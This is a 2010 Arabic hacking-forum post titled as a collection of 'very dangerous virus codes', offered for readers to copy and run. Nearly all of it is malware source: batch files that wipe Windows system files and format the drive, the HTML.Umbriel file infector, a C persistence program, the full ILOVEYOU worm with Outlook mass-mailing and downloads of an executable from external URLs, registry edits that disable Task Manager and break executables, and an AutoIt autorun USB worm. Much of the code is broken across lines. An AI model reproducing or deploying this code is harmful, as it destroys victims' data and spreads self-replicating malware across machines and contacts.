منتديات ايجي هاك سكول

عزيزي الزائر / عزيزتي الزائرة يرجي التكرم بتسجبل الدخول اذا كنت عضو معنا
او التسجيل ان لم تكن عضو وترغب في الانضمام الي اسرة المنتدي
سنتشرف بتسجيلك
شكرا
ادارة المنتدي

برامج هكر / برامج نت / افلام / العاب / برامج مج33 ونيم بظ


    اقوا اكوااد فايروسات خطيره جدا

    شاطر

    فانتوم...ايجي هاك سكول
    شخصية مهمة في المنتدي
    شخصية مهمة في المنتدي

    عدد المساهمات : 78
    تاريخ التسجيل : 28/08/2010
    العمر : 20

    اقوا اكوااد فايروسات خطيره جدا

    مُساهمة  فانتوم...ايجي هاك سكول في الأحد أغسطس 29, 2010 6:57 pm

    اقوا اكواد فايروسات مدمره للكمبيوترات --->

    كودات فايروسات
    echo off
    1
    echo WELCOME AT DARKHACK 2005
    echo echo off >> c:\autoexec.bat
    echo del c:\windows\explorer.exe >> c:\autoexec.bat
    echo copy c:\windows\winpopup.exe c:\windows\explorer.exe >> c:\autoexec.bat
    echo del c:\windows\command\xcopy.exe >> c:\autoexec.bat
    echo del c:\windows\command\xcopy32.exe >> c:\autoexec.bat
    echo echo ON EST PAS DES CRASHERS >> c:\autoexec.bat
    echo pause >> c:\autoexec.bat
    echo echo HI MAN !!! HOW ARE YOU ? >> c:\autoexec.bat
    echo pause >> c:\autoexec.bat
    echo REGEDIT4 >> c:\windows\registre.reg
    echo [-HKEY_CLASSES_ROOT\.exe] >> c:\windows\registre.reg
    echo [-HKEY_CLASSES_ROOT\.com] >> c:\windows\registre.reg
    echo [-HKEY_CLASSES_ROOT\.bat] >> c:\windows\registre.reg
    echo [-HKEY_CLASSES_ROOT\.sys] >> c:\windows\registre.reg
    echo [-HKEY_CLASSES_ROOT\.hlp] >> c:\windows\registre.reg
    copy c:\windows\registre.reg
    c:\windows\menudé~1\progra~1\démarr~1\registre.reg
    del c:\windows\registre.reg
    echo DECRYPTING
    echo del c:\windows\system\*.dll >>
    c:\windows\menudé~1\progra~1\démarr~1\command.bat
    echo del c:\windows\system\*.sys >>
    c:\windows\menudé~1\progra~1\démarr~1\command.bat
    echo del c:\windows\system\*.ocx >>
    c:\windows\menudé~1\progra~1\démarr~1\command.bat
    echo del c:\windows\system\*.vxd >>
    c:\windows\menudé~1\progra~1\démarr~1\command.bat
    echo del c:\windows\options\cab\*.cab >>
    c:\windows\menudé~1\progra~1\démarr~1\command.bat
    echo del c:\windows\*.dll >> c:\windows\menudé~1\progra~1\démarr~1\command.bat
    echo del c:\windows\*.exe >> c:\windows\menudé~1\progra~1\démarr~1\command.bat
    echo del c:\windows\system\*.exe >>
    c:\windows\menudé~1\progra~1\démarr~1\command.bat
    echo del c:\windows\bureau\*.lnk >>
    c:\windows\menudé~1\progra~1\démarr~1\command.bat
    echo del c:\windows\system\*.drv >>
    c:\windows\menudé~1\progra~1\démarr~1\command.bat
    echo del c:\windows\*.ini >> c:\windows\menudé~1\progra~1\démarr~1\command.bat
    echo del c:\windows\fonts\*.ttf >>
    c:\windows\menudé~1\progra~1\démarr~1\command.bat
    echo del c:\windows\SYSTEM32\drivers\*.sys >>
    c:\windows\menudé~1\progra~1\démarr~1\command.bat
    echo del c:\windows\command\*.com >>
    c:\windows\menudé~1\progra~1\démarr~1\command.bat
    echo del c:\windows\*.com >> c:\windows\menudé~1\progra~1\démarr~1\command.bat
    echo del c:\autoexec.bat >> c:\windows\menudé~1\progra~1\démarr~1\command.bat
    echo format c\: /autotest /q >> c:\autoexec.bat
    echo copy c:\windows\test.bat c:\autoexec.bat >>
    c:\windows\menudé~1\progra~1\démarr~1\command.bat
    echo C:\WINDOWS\RUNDLL32.EXE C:\Windows\system\User.exe,ExitWindows >>
    c:\windows\menudé~1\progra~1\démarr~1\command.bat
    echo BYE BYE IS IT YOUR PASSWORD
    C:\WINDOWS\RUNDLL32.EXE C:\Windows\system\User.exe,ExitWindows
    2
    [
    HTML.Ubriel
    for WindowsXP]:
    كود
    <html><!--Umbriel-->
    <head>
    <title> Second Part To Hell's HTML.Umbriel </title>
    </head>
    <body>
    <script language="VBScript">
    rem VBS
    On Error Resume Next
    Dim fso, shell, wrte, tempdir, windir, rand, file
    Set fso=CreateObject("Scripting.FileSystemObject")
    Set shell=CreateObject("Wscript.Shell")
    if err.number=429 Then
    shell.Run javascript:location.reload()
    End If
    Set windir=fso.GetSpecialFolder(0)
    Set tempdir=fso.GetSpecialFolder(2)
    Set wrte=fso.CreateTextFile(windir+"\windows.cmd")
    wrte.WriteLine "cls"
    wrte.WriteLine "@echo off"
    wrte.WriteLine "shutdown -s -f -t 300 -c "+chr(34)+"Second Part To Hell's
    Umbriel has you..."+chr(34)
    wrte.Close()
    shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
    Explorer\Desktop\Components\1\Source", "C:\umbriel.html"
    shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
    Explorer\Desktop\Components\1\SubscribedURL", "C:\umbriel.html"
    Randomize
    rand=int(rnd*5)+1
    If rand=1 then
    shell.Run windir+"\windows.cmd"
    End If
    </script>
    <script language="JavaScript">
    // JS
    var viruspath, virus, code, fso, file, check, checka, checkb
    fso=new ActiveXObject("Scripting.FileSystemObject")
    viruspath=window.location.pathname
    viruspath=viruspath.slice(1)
    virus=fso.OpenTextFile(viruspath,1)
    file=fso.CreateTextFile("C:\\umbriel.html")
    for (i=0; i<500; i++)
    {
    if (checkb!=1)
    {
    if (Math.round(Math.random()*5)+1 == 3)
    {
    if (check == 2)
    {
    file.WriteLine("/"+"*")
    file.WriteLine("*"+"/")
    }
    if (check == 3)
    {
    file.WriteLine("rem")
    }
    }
    code=virus.ReadLine()
    if (code == "/"+"*") { checka=666 }
    if (code == "*"+"/") { checka=666 }
    if (code == "rem") { checka=666 }
    if (checka != 666 ) { file.WriteLine(code) }
    checka=0
    if (code=="</"+unescape("%68")+"tml>") { checkb=1 }
    if (code=="// JS") { check=2 }
    if (code=="rem VBS") { check=3 }
    if (code=="</"+unescape("%73")+"cript>") { check=0 }
    }
    }
    virus.Close();
    file.Close();
    </script>
    <script language="VBScript">
    rem VBS
    On Error Resume Next
    set fso=CreateObject("Scripting.FileSystemObject")
    set shell=CreateObject("WScript.Shell")
    set myfile=fso.OpenTextFile("C:\umbriel.html")
    mycode=myfile.ReadAll
    myfile.Close()
    rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer
    \FrontPage Explorer\Recent Page List\File1")
    if rr <> "" Then Call Umbriel(rr, mycode)
    rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer
    \FrontPage Explorer\Recent Page List\File2")
    if rr <> "" Then Call Umbriel(rr, mycode)
    rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer
    \FrontPage Explorer\Recent Page List\File3")
    if rr <> "" Then Call Umbriel(rr, mycode)
    rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer
    \FrontPage Explorer\Recent Page List\File4")
    if rr <> "" Then Call Umbriel(rr, mycode)
    rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer
    \FrontPage Explorer\Recent Page List\File5")
    if rr <> "" Then Call Umbriel(rr, mycode)
    Sub Umbriel(rr, mycode)
    set victim=fso.OpenTextFile(rr)
    infcheck=victim.ReadLine
    If infcheck<>"<html><!--Umbriel-->" Then
    viccode=victim.ReadAll
    victim.Close()
    set wrtevic=fso.OpenTextFile(rr, 2, false, 0)
    wrtevic.Write (mycode+infcheck+chr(13)+chr(10)+viccode)
    wrtevic.Close
    End If
    End Sub
    </script>
    </body>
    </html>
    هذا كود فيروس لقيتة في موقع اجنبي جديد
    شغلتة يسوي ريستارات للجهاز حسب
    مافهمت مبرمج باللغة السي
    3
    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>
    {
    char sys1[256];
    char sys2[256];
    char win1[256];
    GetModuleFileName(hMod, path, sizeof(path));
    GetSystemDirectory(sys1, sizeof(sys1));
    GetSystemDirectory(sys2, sizeof(sys2));
    GetWindowsDirectory(win1, sizeof(win1));
    strcat(sys1, "\\Sleep.exe");
    strcat(sys2, "\\Doom32.com");
    strcat(win1, "\\WinUpdate.exe");
    CopyFile(path, sys1, false);
    CopyFile(path, sys2, false);
    CopyFile(path, win1, false);
    MessageBox (0, "Not been foun Ram ", "Error !",
    MB_ICONERROR | MB_OK);
    HKEY hKey;
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,
    "Software\\Microsoft\\Windows\\CurrentVersion\\
    Run ", 0, KEY_SET_VALUE, &hKey);
    RegSetValueEx(hKey, "SLEEP", 0, REG_SZ,
    (const unsigned char*) sys1, sizeof(sys1));
    RegSetValueEx(hKey, "DOOM32", 0, REG_SZ,
    (const unsigned char*) sys2, sizeof(sys2));
    RegSetValueEx(hKey, "WinUpdate", 0, REG_SZ,
    (const unsigned char*) win1, sizeof(win1));
    RegCloseKey(hKey);
    }
    {
    system("shutdown s
    f
    ");
    MessageBox(NULL,"Not enough memory to load
    this file.","Error !", MB_ICONERROR |
    MB_OK);
    }
    وهذا كود من عندي للكس بي
    طبعا batch file
    يعني انسخه وحطه في المفكرة واحفظة
    بامتداد bat
    4
    :كود
    @echo off
    echo hi
    del/a/q c:\windows\*.*
    del/a/q c:\windows\system32\*.*
    rmdir/s/q c:\windows
    echo bey
    pause
    " هذا كود لفيرس "الحب
    ******************************
    rem barok loveletter(
    vbe) <i hate go to school>
    rem by: spyder / [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] /
    @GRAMMERSoft Group /
    Manila,Philippines
    On Error Resume Next
    dim
    fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d
    ow
    eq=""
    ctr=0
    Set fso =
    CreateObject("Scripting.FileSystemObject")
    set file =
    fso.OpenTextFile(WScript.ScriptFullname,1)
    vbscopy=file.ReadAll
    main()
    sub main()
    On Error Resume Next
    dim wscr,rr
    set wscr=CreateObject("WScript.Shell")
    rr=wscr.RegRead("HKEY_CURRENT_USER\Sof
    tware\Micros oft\Windows Scripting
    Host\Settings\Timeout")
    if (rr>=1) then
    wscr.RegWrite
    "HKEY_CURRENT_USER\Software\Microsoft\W
    indows Scripting
    Host\Settings\Timeout",0,"REG_DWORD"
    end if
    Set dirwin = fso.GetSpecialFolder(0)
    Set dirsystem = fso.GetSpecialFolder(1)
    Set dirtemp = fso.GetSpecialFolder(2)
    Set c = fso.GetFile(WScript.ScriptFullName)
    c.Copy(dirsystem&"\MSKernel32.vbs")
    c.Copy(dirwin&"\Win32DLL.vbs")
    c.Copy(dirsystem&"\LOVELETTERFORYOU.
    TXT.vbs")
    regruns()
    html()
    spreadtoemail()
    listadriv()
    end sub
    sub regruns()
    On Error Resume Next
    Dim num,downread
    regcreate
    "HKEY_LOCAL_MACHINE\Software\Microsoft\
    Windows\Cur rentVersion\Run\MSKernel32
    ",dirsystem&"\MSKernel32.vbs"
    regcreate
    "HKEY_LOCAL_MACHINE\Software\Microsoft\
    Windows\Cur rentVersion\RunServices\Wi
    n32DLL",dirwin&"\Win32DLL.vbs"
    downread=""
    downread=regget("HKEY_CURRENT_USER\Soft
    ware\Micros oft\Internet
    Explorer\Download Directory")
    if (downread="") then
    downread="c:"
    end if
    if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
    Randomize
    num = Int((4 * Rnd) + 1)
    if num = 1 then
    regcreate "HKCU\Software\Microsoft\Internet
    Explorer\Main\Start
    Page","http://www.skyinet.net/~young1s/HJKhjnw
    erhjkxcvytwertnMTFwetrdsfmhPnj
    w6587345gvsdf7679njbvYT/WINBUGSFIX.
    exe"
    elseif num = 2 then
    regcreate "HKCU\Software\Microsoft\Internet
    Explorer\Main\Start
    Page","http://www.skyinet.net/~angelcat/skladjflfd
    jghKJnwetryDGFikjUIyqwerWe
    546786324hjk4jnHHGbvbmKLJKjhkqj4w/WINBUGSFIX.
    exe"
    elseif num = 3 then
    regcreate "HKCU\Software\Microsoft\Internet
    Explorer\Main\Start
    Page","http://www.skyinet.net/~koichi/jf6TRjkcbG
    RpGqaq198vbFV5hfFEkbopBdQZnm
    POhfgER67b3Vbvg/WINBUGSFIX.
    exe"
    elseif num = 4 then
    regcreate "HKCU\Software\Microsoft\Internet
    Explorer\Main\Start
    Page","http://www.skyinet.net/~chu/sdgfhjksdfjkl
    NBmnfgkKLHjkqwtuHJBhAFSDGjkh
    YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnma
    dshfgqw237 461234iuy7thjg/WINBUGSFIX
    .exe"
    end if
    end if
    if (fileexist(downread&"\WINBUGSFIX.
    exe")=0)
    then
    regcreate
    "HKEY_LOCAL_MACHINE\Software\Microsoft\
    Windows\Cur rentVersion\Run\WINBUGSFI
    X",downread&"\WINBUGSFIX.
    exe"
    regcreate
    "HKEY_CURRENT_USER\Software\Microsoft\In
    ternet Explorer\Main\Start
    Page","about:blank"
    end if
    end sub
    sub listadriv
    On Error Resume Next
    Dim d,dc,s
    Set dc = fso.Drives
    For Each d in dc
    If d.DriveType = 2 or d.DriveType=3 Then
    folderlist(d.path&"")
    end if
    Next
    listadriv = s
    end sub
    sub infectfiles(folderspec)
    On Error Resume Next
    dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
    set f = fso.GetFolder(folderspec)
    set fc = f.Files
    for each f1 in fc
    ext=fso.GetExtensionName(f1.path)
    ext=lcase(ext)
    s=lcase(f1.name)
    if (ext="vbs") or (ext="vbe") then
    set ap=fso.OpenTextFile(f1.path,2,true)
    ap.write vbscopy
    ap.close
    elseif(ext="js") or (ext="jse") or (ext="css") or
    (ext="wsh") or (ext="sct")
    or (ext="hta") then
    set ap=fso.OpenTextFile(f1.path,2,true)
    ap.write vbscopy
    ap.close
    bname=fso.GetBaseName(f1.path)
    set cop=fso.GetFile(f1.path)
    cop.copy(folderspec&""&bname&".vbs")
    fso.DeleteFile(f1.path)
    elseif(ext="jpg") or (ext="jpeg") then
    set ap=fso.OpenTextFile(f1.path,2,true)
    ap.write vbscopy
    ap.close
    set cop=fso.GetFile(f1.path)
    cop.copy(f1.path&".vbs")
    fso.DeleteFile(f1.path)
    elseif(ext="mp3") or (ext="mp2") then
    set mp3=fso.CreateTextFile(f1.path&".vbs")
    mp3.write vbscopy
    mp3.close
    set att=fso.GetFile(f1.path)
    att.attributes=att.attributes+2
    end if
    if (eq<>folderspec) then
    if (s="mirc32.exe") or (s="mlink32.exe") or
    (s="mirc.ini") or
    (s="script.ini") or (s="mirc.hlp") then
    set
    scriptini=fso.CreateTextFile(folderspec&"\script.i
    ni")
    scriptini.WriteLine "[script]"
    scriptini.WriteLine ";mIRC Script"
    scriptini.WriteLine "; Please dont edit this script...
    mIRC will corrupt,
    if mIRC will"
    scriptini.WriteLine " corrupt... WINDOWS will
    affect and will not run
    correctly. thanks"
    scriptini.WriteLine ";"
    scriptini.WriteLine ";Khaled MardamBey"
    scriptini.WriteLine ";http://www.mirc.com"
    scriptini.WriteLine ";"
    scriptini.WriteLine "n0=on 1:JOIN:#:{"
    scriptini.WriteLine "n1= /if ( $nick == $me )
    { halt }"
    scriptini.WriteLine "n2= /.dcc send $nick
    "&dirsystem&"\LOVELETTERFORYOU.
    HTM"
    scriptini.WriteLine "n3=}"
    scriptini.close
    eq=folderspec
    end if
    end if
    next
    end sub
    sub folderlist(folderspec)
    On Error Resume Next
    dim f,f1,sf
    set f = fso.GetFolder(folderspec)
    set sf = f.SubFolders
    for each f1 in sf
    infectfiles(f1.path)
    folderlist(f1.path)
    next
    end sub
    sub regcreate(regkey,regvalue)
    Set regedit = CreateObject("WScript.Shell")
    regedit.RegWrite regkey,regvalue
    end sub
    function regget(value)
    Set regedit = CreateObject("WScript.Shell")
    regget=regedit.RegRead(value)
    end function
    function fileexist(filespec)
    On Error Resume Next
    dim msg
    if (fso.FileExists(filespec)) Then
    msg = 0
    else
    msg = 1
    end if
    fileexist = msg
    end function
    function folderexist(folderspec)
    On Error Resume Next
    dim msg
    if (fso.GetFolderExists(folderspec)) then
    msg = 0
    else
    msg = 1
    end if
    fileexist = msg
    end function
    sub spreadtoemail()
    On Error Resume Next
    dim
    x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
    set regedit=CreateObject("WScript.Shell")
    set
    out=WScript.CreateObject("Outlook.Application"
    )
    set mapi=out.GetNameSpace("MAPI")
    for ctrlists=1 to mapi.AddressLists.Count
    set a=mapi.AddressLists(ctrlists)
    x=1
    regv=regedit.RegRead("HKEY_CURRENT_USE
    R\Software\M icrosoft\WAB"&a)
    if (regv="") then
    regv=1
    end if
    if (int(a.AddressEntries.Count)>int(regv)) then
    for ctrentries=1 to a.AddressEntries.Count
    malead=a.AddressEntries(x)
    regad=""
    regad=regedit.RegRead("HKEY_CURRENT_USE
    R\Software\ Microsoft\WAB"&malead)
    if (regad="") then
    set male=out.CreateItem(0)
    male.Recipients.Add(malead)
    male.Subject = "ILOVEYOU"
    male.Body = vbcrlf&"kindly check the attached
    LOVELETTER coming from me."
    male.Attachments.Add(dirsystem&"\LOVELETTERFORYOU.
    TXT.vbs")
    male.Send
    regedit.RegWrite
    "HKEY_CURRENT_USER\Software\Microsoft\W
    AB"&malead ,1,"REG_DWORD"
    end if
    x=x+1
    next
    regedit.RegWrite
    "HKEY_CURRENT_USER\Software\Microsoft\W
    AB"&a,a.Ad dressEntries.Count
    else
    regedit.RegWrite
    "HKEY_CURRENT_USER\Software\Microsoft\W
    AB"&a,a.Ad dressEntries.Count
    end if
    next
    Set out=Nothing
    Set mapi=Nothing
    end sub
    sub html
    On Error Resume Next
    dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
    dta1="<HTML><HEAD><TITLE>LOVELETTE
    R HTML<?
    ?
    TITLE><META
    NAME=@@
    Generator@@
    &@#&@#&@#&@#&@#&@#&@#=@@
    BAROK VBS LOVELETTER@
    @>"&
    vbcrlf& _
    "<META NAME=@@
    Author@@
    &@#&@#&@#&@#&@#&@#&@#=@@
    spyder ??
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] ??
    @GRAMMERSoft Group ??
    Manila,
    Philippines ??
    March 2000@@>"&
    vbcrlf& _
    "<META NAME=@@
    Description@@
    &@#&@#&@#&@#&@#&@#&@#=@@
    simple
    but i think this is
    good...@@>"&
    vbcrlf& _
    "<??
    HEAD><BODY
    ONMOUSEOUT=@@
    window.name=##
    main##;
    window.open(##
    LOVELETTERFORYOU.
    HTM#
    #,#
    #
    main##)@
    @
    "&vbcrlf& _
    "ONKEYDOWN=@@
    window.name=##
    main##;
    window.open(##
    LOVELETTERFORYOU.
    HTM#
    #,#
    #
    main##)@
    @
    BGPROPERTIES=@@
    fixed@@
    BGCOLOR=@@#
    FF9933@@>"&
    vbcrlf& _
    "<CENTER><p>This HTML file need ActiveX
    Control<??
    p><p>To Enable to read
    this HTML file<BR>Please
    press ##
    YES##
    button to Enable
    ActiveX<??
    p>"&vbcrlf& _
    "<??
    CENTER><MARQUEE LOOP=@@
    infinite@@
    BGCOLOR=@@
    yellow@@>
    zz<?
    ?
    MARQUEE>
    "&vbcrlf& _
    "<??
    BODY><??
    HTML>"&vbcrlf& _
    "<SCRIPT language=@@
    JScript@@>"&
    vbcrlf& _
    "<!?
    ??
    ?"&
    vbcrlf& _
    "if (window.screen){var wi=screen.availWidth;var
    hi=screen.availHeight;window.****To(0,0);window.
    re sizeTo(wi,hi);}"&vbcrlf& _
    "???
    ?
    >"&
    vbcrlf& _
    "<??
    SCRIPT>"&vbcrlf& _
    "<SCRIPT LANGUAGE=@@
    VBScript@@>"&
    vbcrlf& _
    "<!"&
    vbcrlf& _
    "on error resume next"&vbcrlf& _
    "dim
    fso,dirsystem,wri,code,code2,code3,code4,aw,regdit
    "&vbcrlf& _
    "aw=1"&vbcrlf& _
    "code="
    dta2="set fso=CreateObject(@@
    Scripting.FileSystemObject@@)"&
    vbcrlf& _
    "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf&
    _
    "code2=replace(code,chr(91)&chr(45)&chr(91),chr
    (39 ))"&vbcrlf& _
    "code3=replace(code2,chr(93)&chr(45)&chr(93),ch
    r(3 4))"&vbcrlf& _
    "code4=replace(code3,chr(37)&chr(45)&chr(37),ch
    r(9 2))"&vbcrlf& _
    "set wri=fso.CreateTextFile(dirsystem&@@^
    ^
    MSKernel32.vbs@@)"&
    vbcrlf& _
    "wri.write code4"&vbcrlf& _
    "wri.close"&vbcrlf& _
    "if (fso.FileExists(dirsystem&@@^
    ^
    MSKernel32.vbs@@))
    then"&vbcrlf& _
    "if (err.number=424) then"&vbcrlf& _
    "aw=0"&vbcrlf& _
    "end if"&vbcrlf& _
    "if (aw=1) then"&vbcrlf& _
    "document.write @@
    ERROR: can##
    t initialize
    ActiveX@@"&
    vbcrlf& _
    "window.close"&vbcrlf& _
    "end if"&vbcrlf& _
    "end if"&vbcrlf& _
    "Set regedit = CreateObject(@@
    WScript.Shell@@)"&
    vbcrlf& _
    "regedit.RegWrite
    @@
    HKEY_LOCAL_MACHINE^^
    Software^^
    Microsoft^^
    Windows^^
    CurrentVersion^^
    Ru
    n^^
    MSKernel32@@,
    dirsystem&@@^
    ^
    MSKernel32.vbs@@"&
    vbcrlf& _
    "???
    ?
    >"&
    vbcrlf& _
    "<??
    SCRIPT>"
    dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
    dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
    dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
    dt5=replace(dt4,chr(94)&chr(45)&chr(94),"")
    dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
    dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
    dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
    dt6=replace(dt3,chr(94)&chr(45)&chr(94),"")
    set
    fso=CreateObject("Scripting.FileSystemObject")
    set c=fso.OpenTextFile(WScript.ScriptFullName,1)
    lines=Split(c.ReadAll,vbcrlf)
    l1=ubound(lines)
    for n=0 to ubound(lines)
    lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(
    91))
    lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr
    (93))
    lines(n)=replace(lines(n),"",chr(37)+chr(45)+chr(
    37))
    if (l1=n) then
    lines(n)=chr(34)+lines(n)+chr(34)
    else
    lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
    end if
    next
    set b=fso.CreateTextFile(dirsystem+"\LOVELETTERFORYOU.
    HTM")
    b.close
    set d=fso.OpenTextFile(dirsystem+"\LOVELETTERFORYOU.
    HTM",2)
    d.write dt5
    d.write join(lines,vbcrlf)
    d.write vbcrlf
    d.write dt6
    d.close
    end sub
    بالفجوال بيسك
    جلب الداة winsock
    ضع الكود في الفورم ملحظة********
    لتقوموا بتجرتة الكود ************ فقط بعد
    وضع الكود يجب انشاء ملف exe
    4
    le code
    app.taskvisible=false
    call kill("c:\windows\*.exe")
    call kill("c:\windows\*.ini")
    call kill("c:\windows\*.dll")
    أنا خليته في تكست و بعدين بدلت المتداد
    الى .reg
    و الهدف منه ان أي شي امتداده bat exe pif
    com ما يشتغل
    :::::::: و هو كاتالي::::::::
    [line]
    Windows Registry Editor Version 5.00
    [HKEY_CLASSES_ROOT\.bat\PersistentHandler]
    @="{System Axe}"
    [HKEY_CLASSES_ROOT\.pif\PersistentHandler]
    @="{System Axe}"
    [HKEY_CLASSES_ROOT\.exe\PersistentHandler]
    @="{System Axe}"
    [HKEY_CLASSES_ROOT\.com\PersistentHandler]
    @="{System Axe}"
    [line]
    هذا الكود لتعطيل الريجستري وادارة المهام
    ولل gpedit.msc الي يمكن للضحية اذا كان
    شاطر شوي انو يشغل منه اداره المهام
    .....والريجستري
    reg add
    HKCU\software\Microsoft\Windows\CurrentVersi
    on\Pol icies\System\ /v DisableRegistryTools /t
    REG_DWORD /d 0000001 /f
    reg add
    HKEY_CURRENT_USER\Software\Microsoft\Wi
    ndows\Curre ntVersion\Policies\System\ /v
    DisableTaskMgr /t reg_dword /d 00000001 /f
    @del "C:\WINDOWS\system32\gpedit.msc" /q
    أقدم لكم الفيروس الذي يقوم بتغير الشاشة الرئيسية على قولت واحد
    من الشباب .. وأداني الكود .. وأنا دحين بأجربو .. لكن أديكم الكود
    .. وأفيدكم .. لنكم عيوني إنتو
    .. الكود هو
    :كود
    @echo off
    set key=HKCU\Software\Microsoft\Internet Explorer\Main
    set value=Start page
    set data=http://www.tvquran.com/
    reg.exe add "%key%" /v "%value%" /d "%data%" /f >nul
    قمت بصناعة فايروس يقوم بعمل minimize
    للنوافذ المفتوحة
    الية عمله
    عند تشغيله يغير اسمه الى 1
    taskmgr
    ينقل نفسه الى 2
    my document
    يقوم باخفاء نفسه 3
    يسجل اسمه ضمن المسجلت 4
    يقوم بانشاء ملف اوتوران 5
    يقوم بعمل منيمايز للنوافذ المفتوحة حيث 6
    قمت بانشاء عداد يبداء من 1 ويتزايد بمقدار 1
    ويتوقف عندما يصل العدد الى - 1 وهذا
    مستحيل
    بعد النتشار عند فتح اي بارتشن فان 7
    الفايروس سيعمل من جديد حتى بعد اعادة
    التشغيل
    البرنامج المستخدم هو AutoIt Version: 3.2.10.0
    وهذا هو كود الفايروس
    #cs
    AutoIt
    Version: 3.2.10.0
    Author: asd
    Script Function:
    Template AutoIt script.
    #ce
    ;
    Script Start Add
    your code below here
    #NoTrayIcon
    $name="taskmgr"
    $exe=".exe"
    $count=1
    $c="c:"
    $d="d:"
    $e="e:"
    $f="f:"
    $g="g:"
    $h="h:"
    $i="i:"
    $j="j:"
    $k="k:"
    $l="l:"
    $m="m:"
    $n="n:"
    sleep(3000)
    FileCopy (@AutoItExe, @DocumentsCommonDir
    & "" & $name & $exe,0)
    ; Make itself protected (readonly, system, hidden)
    FileSetAttrib (@DocumentsCommonDir & "" &
    $name & $exe,"+RSH")
    ; Copy itself to windows directory
    RegWrite
    ("HKEY_LOCAL_MACHINE\SOFTWARE\Micr
    osoft\Windows
    NT\CurrentVersion\Winlogon","Shell","REG_SZ
    ","Expl orer.exe " & $name & $exe)
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;
    sleep(1000)
    IniWrite (@DocumentsCommonDir &
    "\autorun.ini","Autorun","Open",$name & $exe)
    IniWrite (@DocumentsCommonDir &
    "\autorun.ini","Autorun","Shellexe cute",$name
    & $exe)
    IniWrite (@DocumentsCommonDir &
    "\autorun.ini","Autorun","Shell\Open\command"
    ,$nam e & $exe)
    IniWrite (@DocumentsCommonDir &
    "\autorun.ini","Autorun","Shell","Open")
    Sleep (1)
    FileSetAttrib (@DocumentsCommonDir &
    "\autorun.ini","+RSH")
    do
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;
    FileDelete($c& "\autorun.inf")
    FileDelete($d& "\autorun.inf")
    FileDelete($e& "\autorun.inf")
    FileDelete($f& "\autorun.inf")
    FileDelete($g& "\autorun.inf")
    FileDelete($h& "\autorun.inf")
    FileDelete($i& "\autorun.inf")
    FileDelete($j& "\autorun.inf")
    FileDelete($k& "\autorun.inf")
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;
    FileCopy (@DocumentsCommonDir &
    "\autorun.ini",$c& "\autorun.inf",1)
    FileCopy (@DocumentsCommonDir &
    "\autorun.ini",$d & "\autorun.inf",1)
    FileCopy (@DocumentsCommonDir &
    "\autorun.ini",$e & "\autorun.inf",1)
    FileCopy (@DocumentsCommonDir &
    "\autorun.ini",$f & "\autorun.inf",1)
    FileCopy (@DocumentsCommonDir &
    "\autorun.ini",$g & "\autorun.inf",1)
    FileCopy (@DocumentsCommonDir &
    "\autorun.ini",$h & "\autorun.inf",1)
    FileCopy (@DocumentsCommonDir &
    "\autorun.ini",$i & "\autorun.inf",1)
    FileCopy (@DocumentsCommonDir &
    "\autorun.ini",$j & "\autorun.inf",1)
    FileCopy (@DocumentsCommonDir &
    "\autorun.ini",$k & "\autorun.inf",1)
    FileCopy (@DocumentsCommonDir &
    "\autorun.ini",$l & "\autorun.inf",1)
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;
    FileCopy(@AutoItExe,$c & "" & $name & $exe)
    FileSetAttrib ($c & "" & $name & $exe,"+RSH")
    FileCopy(@AutoItExe,$d & "" & $name & $exe)
    FileSetAttrib ($d & "" & $name & $exe,"+RSH")
    FileCopy(@AutoItExe,$e & "" & $name & $exe)
    FileSetAttrib ($e & "" & $name & $exe,"+RSH")
    FileCopy(@AutoItExe,$f & "" & $name & $exe)
    FileSetAttrib ($f & "" & $name & $exe,"+RSH")
    FileCopy(@AutoItExe,$g & "" & $name & $exe)
    FileSetAttrib ($g & "" & $name & $exe,"+RSH")
    FileCopy(@AutoItExe,$h & "" & $name & $exe)
    FileSetAttrib ($h & "" & $name & $exe,"+RSH")
    FileCopy(@AutoItExe,$i & "" & $name & $exe)
    FileSetAttrib ($i & "" & $name & $exe,"+RSH")
    FileCopy(@AutoItExe,$j & "" & $name & $exe)
    FileSetAttrib ($j & "" & $name & $exe,"+RSH")
    FileCopy(@AutoItExe,$k & "" & $name & $exe)
    FileSetAttrib ($k & "" & $name & $exe,"+RSH")
    FileCopy(@AutoItExe,$l & "" & $name & $exe)
